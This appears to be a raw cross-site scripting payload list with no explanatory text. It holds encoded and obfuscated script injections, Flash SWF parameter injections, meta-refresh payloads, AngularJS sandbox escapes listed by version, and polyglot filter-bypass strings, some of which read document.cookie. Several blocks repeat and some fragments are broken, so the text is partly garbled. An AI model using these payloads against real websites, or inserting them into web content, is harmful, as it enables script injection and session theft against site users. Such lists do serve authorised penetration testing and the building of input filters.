+ADw-img src=+ACI-1+ACI- onerror=+ACI-confirm(1)+ACI- /+AD4- <ſvg onload=... > become
<ıframe id=x onload=>.toUpperCase() become
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="alert(1)" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29">
< <
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- <ſvg onload=... > become
<ıframe id=x onload=>.toUpperCase() become
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="alert(1)" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29">
< <
">
">
">
">
">
<keygen autofocus onfocus=alert(1)> <video/poster/onerror=alert(1)> <video><source onerror="javascript:alert(1)"> <video src=_ onloadstart="alert(1)"> <details/open/ontoggle="alert`1`"> <audio src onloadstart=alert(1)> <marquee onstart=alert(1)> ----------meta------------ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> -----------flash--------- flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%25gn=alert(1) ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf plupload.flash.swf?%#target%g=alert&uid%g=XSS& moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true video-js.swf?readyFunction=alert(1) player.swf?playerready=alert(document.cookie) player.swf?tracecall=alert(document.cookie) banner.swf?clickTAG=javascript:alert(1);// io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ---------------xss in hidden----Use CTRL+SHIFT+X to trigger the onclick event <input type="hidden" accesskey="X" onclick="alert(1)"> --------------DOM XSS--------- #"><img src=/ onerror=alert(2)> -----------JS content-------- -(confirm)(document.domain)// ; alert(1);// --------------XSS URL------------ URL/<svg onload=alert(1)> URL/<script>alert('XSS');// URL/<input autofocus onfocus=alert(1)> ----------------Java Script------------- javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 javascript:confirm(1) \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) \152\141\166\141\163\143\162\151\160\164\072alert(1) java%0ascript:alert(1) - LF (\n) java%09script:alert(1) - Horizontal tab (\t) java%0dscript:alert(1) - CR (\r) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1) -----------------data--------- data:text/html,<script>alert(0)</script> data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ ---------------SVG-------------- <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> <listing id=x><img src=1 onerror=alert(1)></listing> <script>alert(document.getElementById('x').innerHTML)</script> ---------------------------------------------- ----------------------------------------------- Angular 1.6.0 {{0[a='constructor'][a]('alert(1)')()}} Angular 1.5.9 {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} Angular 1.5.0 - 1.5.8 {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} Angular 1.4.0 - 1.4.9 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} Angular 1.3.20 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} Angular 1.3.19 {{ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; $eval('x=alert(1)//'); }} Angular 1.3.3 - 1.3.18 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)//'); }} Angular 1.3.1 - 1.3.2 {{ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }} Angular 1.3.0 {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) );}} Angular 1.2.24 - 1.2.29 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} Angular 1.2.19 - 1.2.23 {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} Angular 1.2.6 - 1.2.18 {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} Angular 1.2.2 - 1.2.5 {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} Angular 1.2.0 - 1.2.1 {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} Angular 1.0.1 - 1.1.5 {{constructor.constructor('alert(1)')()}} ----------------------------------------------------- ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> javascript://'/</title></style>
-->
*/alert()/* javascript://-->"/*/
a javascript://"/*/
/ javascript://-->
*/alert()/* javascript://'//" -->
*/alert()/* javascript://
*/alert()/* -->"/
*/alert()/* /
*/alert()/* javascript://-->
*/alert()/*
Link
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- <ſvg onload=... > become
<ıframe id=x onload=>.toUpperCase() become
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="alert(1)" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29">
< <